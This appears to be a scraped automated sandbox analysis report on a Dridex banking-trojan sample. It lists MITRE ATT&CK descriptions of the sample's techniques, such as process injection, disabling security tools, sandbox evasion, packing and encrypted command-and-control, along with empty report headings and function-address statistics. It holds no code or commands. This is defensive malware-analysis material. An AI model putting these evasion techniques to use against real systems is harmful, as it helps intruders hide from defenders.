Instruction Fuzzy Hash: 5141C3B9E0421A8FDB04DFA8C4946AEBBF1FF48314F15856DE849AB340D375A840CF95

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.12131

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Function 6F030754, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 650
COMMONCrypto

Function 6F03223C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6F032840, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6F033110, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 027B2062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Function 6F0310C8, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6F03578C, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6F035B14, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 6F035B95, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6F035BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6F035BA9, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6F035B8B, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6F035BD9, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6F035DE8, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON